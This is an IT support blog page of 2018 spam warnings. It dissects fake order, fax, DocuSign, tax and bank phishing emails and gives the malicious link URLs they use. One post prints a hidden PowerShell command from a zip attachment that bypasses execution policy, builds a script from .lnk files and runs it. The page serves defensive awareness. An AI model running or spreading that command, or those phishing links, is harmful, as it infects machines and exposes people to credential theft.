sircles.net Computer Support The sircles IT support & solutions blog | SPAM

Twitter Feed Popout byInfofru

The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes

Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent

9. August 2018 07:19 by sirclesadmin in Internet Security, Online Fraud, SPAM
Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent    

Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent

 

This email has been assembled by sourcing information from your personal history online, in this example they have sourced an old telephone number from somewhere, probably sold to them by our local council.

 

From:                                                       Direct <theo-letran@glampiny.com>

Sent:                                                         Thursday, August 9, 2018 6:35 AM

To:                                                            Receipent

Subject:                                                   Your Name, Pack(50RM_84248) confirmed: 7 items sent

 

 

Order Acknowledgment

Dear Your name,

Your order is now confirmed. Thanks for shopping with us!

 

Billing Address:
Your Name 
Your Telephone Number Postcode 




Your Order Reference: 50RM_84248
Order Date: 8/9/2018

Delivery Address:
Your Name
Your Telephone Number Postcode

Your Order 50RM_84248 available here

Your right to cancel:

In addition to the EU and UK Distance Selling Regulations, we offer you 30 days to change your mind on any purchase.

To cancel the order, please complete the enclosed returns slip and return the item(s) to us at the address that is on the returns slip.

We recommend that you use a recorded delivery service.

Please note that you are responsible for the costs of returning the items to us unless the goods delivered are incorrect or faulty. In this case, you will be credited for the cost of your return up to a reasonable amount.

As soon as we receive your item(s) the returns procedure will be initiated and refunds will be processed.

 
 
The hyperlink 'Your Order 50RM_84248 available here' actually links to: https://kocobanana.com/.orderdetails/50RM_84248-confirmation which is presumably a genuine website as it has a certificate but it simply forwards you to: https://support.office.com/office-training-center?wt.mc_id=AID573689_QSG_184686 which is presumably not an association that Microsoft enjoy. 
The actual link downloads a zip file:
 
The contents of the zip file are as follows:
 
 
And when extracted, reveal:
 
 
The image just being a Google Pay image:
 
 
And the shortcut linking to:
 
 
As we can see, this is another Windows Powershell command but one which which we cannot make head or tail of - fildunare is not a term which any of us recognise, so any light anyone can shed would be most welcome.
Either way, it is attempting to find the string fildunare  with a .lnk extension in your documents and invokes desktop.ps1 which doesn't actually seem to be included with any version of Windows and so is a bit of a mystery.
 
Either way, make sure that .ps1 files are blocked inside of attachments, especially archive files, and this will not be an issue.
The originating email domain - glampiny.com - does not seem to be a website either so block that domain from your email server.

Spam Warning: You've received efax Notice

8. August 2018 07:58 by sirclesadmin in Internet Security, SPAM
Spam Warning: You&#39;ve received efax Notice &amp;nbsp; We have seen this email throughout this week: &amp;nbsp

Spam Warning: You've received efax Notice

 

We have seen this email throughout this week:

 

 

 

 

From:                                                       eFax j2 Global <efax@ramatmed.com>

Sent:                                                         Tuesday, August 7, 2018 7:52 PM

To:                                                            Recipient

Subject:                                                   You've received efax Notice

 

 

 

 

eFax_Faxing_Simplified

 

Fax Message; ID: 4734 745 7735,

You have got a 6 page(s) fax at 08-07-2018 08:34:55 GMT.

*Your reference number is ek4_pid02-88444959724931-3463741-40.

Visit www.efax.com/efax-help-center if you have any questions relating to this notification.



The eFax Team

 

j2 footer
2002-2018 j2 Global, Inc. and affiliates. All rights reserved.
eFax is a trademark of j2 Global, Inc.
22592 Hollywood Blvd, Los Angeles, CA 98613

*** This is an automatic message, please do not reply directly to this email address *** Privacy Policy.

 The 'Get Fax Now' link actually points to: http://hvcrmls.info?82a6yp=QIUBNYQASHUBQYUDP Which appears to have already been removed but the site name is so bizarre, it makes you wonder if it ever existed. I am not going to invest time in looking it up but this email is spam and should be reported.
The sender efax@ramatmed.com has a domain of what appears to be a Los Angeles medial supplier but the website is very spartan.
 

Spam Warning: You received notification from DocuSign Signature Service

7. August 2018 06:48 by sirclesadmin in Internet Security, Fraud, Online Fraud, SPAM
Spam Warning: You received notification from DocuSign Signature Service&amp;nbsp; &amp;nbsp;

Spam Warning: You received notification from DocuSign Signature Service 

 

You may see the following email, purportedly from DocuSign. We have seen it being captured by most spam guards but also getting through many on other occasions.

 

 

 

 

From:                                                       DocuSign Signature  Service <docusign@pehache.com>

Sent:                                                        Monday, August 6, 2018 5:21 PM

To:                                                           Recipient

Subject:                                                   You received notification from DocuSign Signature Service

 

 

 

 

 

 

DocuSign

Review and sign this document.

 

Dear Receiver,

Please review this invoice
It is an automatically generated invoice.

 

This email contains a secure information. Do not share this code with other people.

Additional Signing Way
Please visit DocuSign.com, click on 'Access Documents', and enter the security code: F80B75BEF7

About Our Service
Sign invoice electronically in just minutes. It's risk-free. Whether you're at work, home or even across the globe -- Our service gives a professional solution for Digital Transaction Management.

Have questions about an Invoice?
In case you need to modify the document or have questions about the details in the document, reach out to the sender directly.

If you are having trouble signing the document, please see the Help with Signing page on our Webpage .
 

Review Invoice

This message was sent to you by DocuSign Electronic Signature Service.

 

 

 The 'view invoice' link actually points at: http://keithharenda.com?6d50=QAUSY1CQVUFS1QXOBsGSJTHS which is an unsecured site which appears to have been compromised.
The folder appears to have already been removed.
We have also seen: http://nashvillechildfamilywellness.com?20Yy5=QAUSY1CQVUFS1QXOBsGSJTH S being used by the same email.
The 'review invoice' link at the bottom points to: http://kphbuilds.com?7P62A=QAUSY1CQVUFS1QXOBsGSJTHS which also appears to have been shut down.
 
Report any senders of this email, the pehache.com domain does not seem to function either.

Internal Revenue Service - Spam Warning !

1. August 2018 13:29 by sirclesadmin in Internet Security, Online Fraud, SPAM
Internal Revenue Service - Spam Warning ! Watch out for more free money! This email has been receive

Internal Revenue Service - Spam Warning !

Watch out for more free money!

This email has been received this week:

 

 

From:                                                       Internal Revenue Service <irs@aubodyshop.com>

Sent:                                                         Tuesday, July 31, 2018 6:16 PM

To:                                                            Recipient

Subject:                                                   Internal Revenue Service

 

IRS.gov Banner

Internal Revenue Service

IRS services     Account Balance communication TP95

 

Final reminder: Notice of Intent to seize (levy) your current income tax refund.


 

promptly: $449.20

Our files indicate that you have unpaid sum for the tax year closing December 31,2017 (Application form ). If you don't call us straight away, we may levy (seize) your house or legal rights to own property which includes any kind of tax refund and also apply it for the amount of money you must pay back.


Download your payment Invoice 


You're witnessing this particular notification due to the fact you're subscribed to our alerts via Internal revenue service.

 If you no more want to get warnings, please log in to your Internal revenue service account  to temporarily disable or completely delete these types of signals.

The following alert is sent to you automatically from the IRS services. Make sure you do not Write back.


Take care of your account, change your security password or e-mail, or discontinue messages at any time on your Personal preferences Web page.

If you have inquiries or problems with the service, be sure to contact www.paygov.us.
.



This service is delivered to you free of charge by the Internal Revenue Service. The following communication is provided through: IRS 1364 Constitution St. N Washington DC 21263.

Powered by GovDelivery

 

 
As this email has been received from a car (auto if you're German/American) repair (body shop) in Indianapolis, we can safely say that it is a spam email.
 
The link 'Download yoru Payment Invoice' points to: http://cliptrips.info?8yi2O=QAUSY1CQVUFS1QXOBsGSJTHS
 
Which has already been taken down - well done for spotting that whoever the owner is...
 
Anyway report this email as spam and stay vigilant!
 

Ooh, a tax refund!! SPAM - (1) New message from GB Revenue and Taxes.

1. August 2018 12:35 by sirclesadmin in Internet Security, Fraud, Online Fraud, SPAM
Ooh, a tax refund!! SPAM - (1) New message from GB Revenue and Taxes. &amp;nbsp; This email has been rec

Ooh, a tax refund!! SPAM - (1) New message from GB Revenue and Taxes.

 

This email has been received this week at sircles spam catcher:

From:                                                       TaxesGreat-Britain <seminar@toitumosi.jp>

Sent:                                                         Wednesday, August 1, 2018 9:26 AM

To:                                                            Support

Subject:                                                   (1) New message from GB Revenue and Taxes.

 

 

-

Taxes&Revenue have detected that you have paid too much tax in the past

 

* Therefore we applied P800WForm to issue a reimbursment.

--we tried to send it to you automatically.

--we don't have your card details on file.

--have your credit/debit card ready

Reimbursement Information

* We applied P800WForm to issue a reimbursment.

* Receipt date : 01 August 2018.

* Amount: 670.25 GB P.

Delivery-Information

Card Type:

VISA

Credit Card:

****-****-****-****

Amount:

670.25

Transaction Date:

01/08/2018

Transaction #:

419277

 

 

Total  

670.25   GB P

 

-

 
 
As you can see the originating address is actually from Japan and so probably isn't that likely to give me a tax refund after all :(
 
The GBP is a bit of a giveaway too, as even in London, most people still use the British Pound without being prompted.
 
The 'Claim Funds' link points to: http://mocosi.co.za/img/acgetopai/ which is actually already registered as deceptive by Chrome and has been registered as unsafe by Microsoft Edge.
 
The actual site:
 
 
Once you choose your wishes they take you to:
 
 
HMRC do not know your banking details, and will never ask you to confirm your identity with your card details or account number. This site is not secure and should therefore not be accepting card details anyway.
 
Never enter card details without checking the padlock in the address bar is showing in green or as OK. Always check the domain in the address bar, all the way up until the first / and make sure it is just the expected domain like sircles.net with nothing following it unless after a /
 
Report this email and report the website.
 
Be safe!!!

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent &amp;nbsp; This email has been spotted

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

 

This email has been spotted this week:

 

 

 

From: lou_weihe@clarityconfidenceandcash.com

Sent:                                                         Monday, July 30, 2018 10:52 PM

To:                                                            Recipient

Subject:                                                   Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

 

WOMEN

MEN

ACCESSORIES

HOME DECOR

GADGETS


Hi Your Name,

Great news! Your order is now confirmed. We will email you again when your items ship.

Thanks for shopping with us!

Order ID: 4M0A_8141

Shipping Address:

Your Name
Your Phone Your Postcode 

View Order


This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us 

 

 
Which downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???
 
If you unzip the file that is provided you see an image:
 
 
Which presumably pretends to be a real company.
 
And a file which runs a script:
 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
 
Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?
 
We will let you know.
 
Anyway, report the sender and the website and keep vigilant!
 
 

Spam Warning: Important Docs Secured ShareFile Attachment

Spam Warning: Important Docs Secured ShareFile Attachment &amp;nbsp; Watch out for this email doing the

Spam Warning: Important Docs Secured ShareFile Attachment

 

Watch out for this email doing the rounds this week:

 

From:                                                       Tracy Turner <tturner@brealzeta.com>

Sent:                                                         Thursday, July 19, 2018 5:07 PM

Subject:                                                   Important Docs

 

 

Secured ShareFile Attachment

Expires July 20, 2018

Brealzeta.pdf

568.9 KB

Review Documents

I used WeTransfer to send documents to you securely. Learn More.

 

 

If you need any further assistance, then do not hesitate to contact me.

 

Tracy Turner
Breal Zeta CF Ltd
t: 07803 178446

 

The 'Review Documents' link actually points at https://theqfotaaerwrcgfd.co.uk/ces/ffw/(*%5E%25%26*(*%5E%24%25%5E%26%25%5E%24%25%23%23%24%25%5E%26 

 

So be careful here - this is a fully secured SSL site with an SSL certificate:

 

 

The domain theqfotaaerwrcgfd.co.uk appears to be running on a CPanel server with a certificate from:

 

 

Comodo for CPanel. 

 

From the look of the site: 

 

 

They seem to impersonating WeTransfer and ShareFile at the same time, so this is obviously quite a big scam.

The website has been thoughtfully put together to steal important credentials and a person who knows a tracy turner could easily input all three of their Google, Office365 and GoDaddy details.

 

The GoDaddy one is crafty but obviously there are no documents storage houses in the world that would ask for your internet domain credentials.

 

If you click the 'others' option, then you are taken through to a WeTransfer impersonation site:

 

https://theqfotaaerwrcgfd.co.uk/ces/ffw/(*%5e%25&*(*%5e$%25%5e&%25%5e$%25%23%23$%25%5e&/email_signin/index.html

 

 

 

Which is again a convincing looking site using the same certificate.

 

The IP address gives this data:

% Information related to '89.36.218.0 - 89.36.218.255'

% Abuse contact for '89.36.218.0 - 89.36.218.255' is 'abuse@staff.aruba.it'

inetnum: 89.36.218.0 - 89.36.218.255
geoloc: 50.10 8.70
netname: CLOUD-DE
descr: Cloud Services DC05
country: DE
admin-c: SS936-RIPE
tech-c: AN3450-RIPE
status: ASSIGNED PA
mnt-by: ARUBA-MNT
mnt-lower: ARUBA-MNT
mnt-routes: XANDMAIL-MNT
created: 2016-01-11T14:37:36Z
last-modified: 2016-01-11T14:37:36Z
source: RIPE

role: ARUBA NOC
address: Aruba S.p.A.
address: via S.Clemente 53
address: 24036 Ponte San Pietro (BG)
address: Italy
abuse-mailbox: abuse@staff.aruba.it
admin-c: SS936-RIPE
tech-c: SC279-RIPE
nic-hdl: AN3450-RIPE
mnt-by: ARUBA-MNT
created: 2008-11-19T19:02:34Z
last-modified: 2017-11-15T08:13:57Z
source: RIPE # Filtered

person: Susanna Santini
address: Aruba S.p.A.
address: Via S.Clemente, 53
address: 24036 Ponte San Pietro (BG)
phone: +39 0575 0505
fax-no: +39 0575 862000
nic-hdl: SS936-RIPE
mnt-by: ARUBA-MNT
created: 1970-01-01T00:00:00Z
last-modified: 2017-11-15T08:14:40Z
source: RIPE # Filtered

% Information related to '89.36.216.0/22AS200185'

route: 89.36.216.0/22
descr: Aruba GmbH Cloud Network DC05
origin: AS200185
mnt-by: ARUBA-MNT
created: 2015-12-09T12:07:07Z
last-modified: 2015-12-09T12:07:25Z
source: RIPE

 

We will email the abuse address to report these sites...

Spam warning - HelloFax, Someone Sent You a Fax

10. July 2018 08:12 by sirclesadmin in Internet Security, SPAM
Spam warning - HelloFax, Someone Sent You a Fax &amp;nbsp; This email has been received in the last coup

Spam warning - HelloFax, Someone Sent You a Fax

 

This email has been received in the last couple of days:

 

From:                                                       HelloFax <hellofax@abramscpa.com>

Sent:                                                         Monday, July 9, 2018 3:22 PM

To:                                                            Recipient

Subject:                                                   HelloFax, Someone Sent You a Fax

 

 

HelloFax

The best way to sign and send faxes on-line

Dear Customer,

Here is Your HelloFax

Date and Time: 07/09/2018 08:10 AM
Number of pages: 9

Reference number: TGD656358K.


Thank you for going paperless!
- HelloFax Team

 

We think your workplace can be paperless!
HelloFax Send Documents Online
HelloSign Sign Documents Online
HelloSign for Gmail Sign with Gmail

504 Howard Street, Suite 350
San Diego , CA

Add us to your address book

 
 
The 'Get Your Fax' link points to http://wegetthelintout.ca?7v7Rh=QAUSY1CQVUFS1QXOBsGSJTHS  which no longer seems to respond, so the owners must have disabled it until the fraudulent pages have been removed.
Please report this message as spam anyway to get the source address blacklisted.

SPAM: yourdomain.com Final Extension

19. June 2018 10:14 by sirclesadmin in Online Fraud, SPAM
SPAM: yourdomain.com Final Extension &amp;nbsp; Another domain renewal scam is circulating this week. Th

SPAM: yourdomain.com Final Extension

 

Another domain renewal scam is circulating this week.

The format is the same as usual - danger, danger danger, about to expire, your domain, final warning etc.

Then right at the bottom it says something like:

Failure to make payment may result in account closing (making it difficult for your customers and your friends to locate you, using search engines on the web).

So it is actually a service to submit you to search engines.

 

Well there is only really one search engine unfortunately, although Ecosia's plan is a good one, so there is no need to pay someone to submit your pages. Google are quite capable of finding you themselves.

 

The email arrives as:

 

- ACT IMMEDIATELY -

FINAL EXTENSION

PURCHASE EXPIRATION DATE: 06.26.2018

 

Final Extension

 

LAST OVERDUE NOTICE FOR DOMAIN

Notice#: 049436077

your domain

Date: 06.19.2018

 

DOMAIN: yourdomain.suffix

ACCOUNT BALANCE: $0.00

 

PLEASE CLICK ON

 

TO CARRY OUT YOUR PAYMENT

 

PAYMENT

OVERDUE

!

 

Your Name

Address

Town

Region, Post Code, Country

 

Domain Name:

Registration Period:

Price:

Term:

YourDomain.suffix

Today to One year away

$84.00

1 Year

 

 

PLEASE CLICK ON

 

PAYMENT

OVERDUE

FOR


yourdomain.suffix

ACT TODAY!

 

Dear Your Name,

This is the final billing notice to complete this order by 1 Week failure to make payment may result in account closing (making it difficult for your customers and your friends to locate you, using search engines on the web).

 

 

PLEASE NOTE:

This Email contains information intended only for the individuals or entities to which it is addressed. If you are not the intended recipient or the agent responsible for delivering it to the intended recipient, or have received this Email in error, please notify immediately the sender of this Email and then completely delete it (including any attachments). Any other action taken in reliance upon this Email is strictly prohibited, including but not limited to unauthorized copying, printing, disclosure, or distribution. The sender bears no responsibility for any loss, disruption or damage to your data or computer system that may occur while using data contained in, or transmitted with, this Email. Any views expressed are personal unless otherwise stated. unlike here Providing false information will result in suspension of the customer's account.Thank you for your cooperation.

 

 

 

 

The unsubscribe link points to: http://yourdomain.com.onlineadvice.top/unsubscribe/

The secure payment link links to: http://yourdomain.suffix.onlineadvice.top/?d=yourdomain&y=06.27.2018

Report the website onlineadvice.top as spam and the website it takes you to: seockaccepted.org should be reported as a phishing site.

Report the email as spam.

Many thanks.

 

 

 

SECURITY ALERT - Tesco Bank Spam Scam

12. June 2018 07:33 by sirclesadmin in Fraud, Online Fraud, SPAM
SECURITY ALERT - Tesco Bank Spam Scam &amp;nbsp; Beware of these fake Tesco spam emails: &amp;nbsp; v\:*

SECURITY ALERT - Tesco Bank Spam Scam

 

Beware of these fake Tesco spam emails:

 

From:                                         TescoBankOnline@mail.net

Sent:                                           11 June 2018 16:24

To:                                               Recipient

Subject:                                     SECURITY ALERT

 

 

SECURITY ALERT  

You are receiving this email because we noticed an attempt to sign in to your account from an unrecognised device. Our system has blocked this sign in attempt as a security measure. 


In order to safeguard your account information we have temporarily restricted your access to certain features within our online banking system. To restore full access please click the link below to validate your account information.

Please note:
 Failure to restore full access can lead to permanent suspension of access to our online banking service.

==================================================
Get Started ⇨
==================================================

Best regards,


Tesco  Online Banking Team

 

The 'Get Started' link actually takes you to: https://newsforeveryone.top/tescoOnline/index.php

Cloud Flare have already labelled this site as phishing: